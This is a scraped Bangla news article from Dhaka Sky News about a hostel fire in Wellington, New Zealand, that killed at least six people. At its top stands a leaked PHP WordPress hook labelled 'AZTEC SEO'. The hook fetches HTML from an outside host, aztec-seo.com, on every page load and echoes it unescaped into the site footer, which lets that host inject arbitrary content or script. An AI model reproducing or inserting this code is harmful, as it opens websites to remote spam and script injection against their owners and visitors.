/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); নিউজিল্যান্ডের হোস্টেলে আগুন, ৬ জন নিহত | Dhaka Sky News

নায়ক ফারুক আর নেই

আগের সংবাদ

এবার আসছে ঘূর্ণিঝড় ফ্যাবিয়ান

পরের সংবাদ

নিউজিল্যান্ডের হোস্টেলে আগুন, ৬ জন নিহত

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: May 16, 2023 , 9:31 am

নিউজিল্যান্ডের রাজধানী ওয়েলিংটনের একটি হোস্টেলে ভয়াবহ অগ্নিকাণ্ডের ঘটনা ঘটেছে। এতে অন্তত ৬ জনের মৃত্যু হয়েছে। নিখোঁজ রয়েছেন আরও অনেকে। দেশটির প্রধানমন্ত্রী ক্রিস হিপকিনসের বরাতে স্থানীয় গণমাধ্যম এ তথ্য জানিয়েছে। খবর বিবিসির।
সোমবার স্থানীয় সময় রাত সাড়ে ১২ টার দিকে ওয়েলিংটনের চারতলা লোফার্স লজ হোস্টেলে এই অগ্নিকাণ্ডের ঘটনা ঘটে।
পুলিশ বলছে, বেশ কয়েকজনকে ভবন থেকে উদ্ধার করা হয়েছে। তবে অনেকে এখনও নিখোঁজ রয়েছেন। প্রাথমিকভাবে মনে হচ্ছে মৃতের সংখ্যা ১০ এর কম। তবে আমরা বিল্ডিংটিতে প্রবেশ না করা পর্যন্ত নির্দিষ্ট কিছু বলতে পারছি না।
দেশটির প্রধানমন্ত্রী সতর্ক করে বলেছেন, মৃতের সংখ্যা আরও বাড়তে পারে।
দমকলকর্মীরা জানান, তারা যখন ঘটনাস্থলে পৌঁছান তখন ভবনের উপরের তালায় আগুন জ্বলতে দেখেন। ভোর ৪ টার দিকে ফায়ার সার্ভিসের ২০টি ট্রাকের সহযোগিতায় আগুন নিয়ন্ত্রণে আসে।
ফায়ার অ্যান্ড ইমার্জেন্সি ডিস্ট্রিক্ট কমান্ডার নিক পাইট এই আগুনকে ওয়েলিংটনের ‘সবচেয়ে খারাপ দুঃস্বপ্ন’ বলে বর্ণনা করেছেন।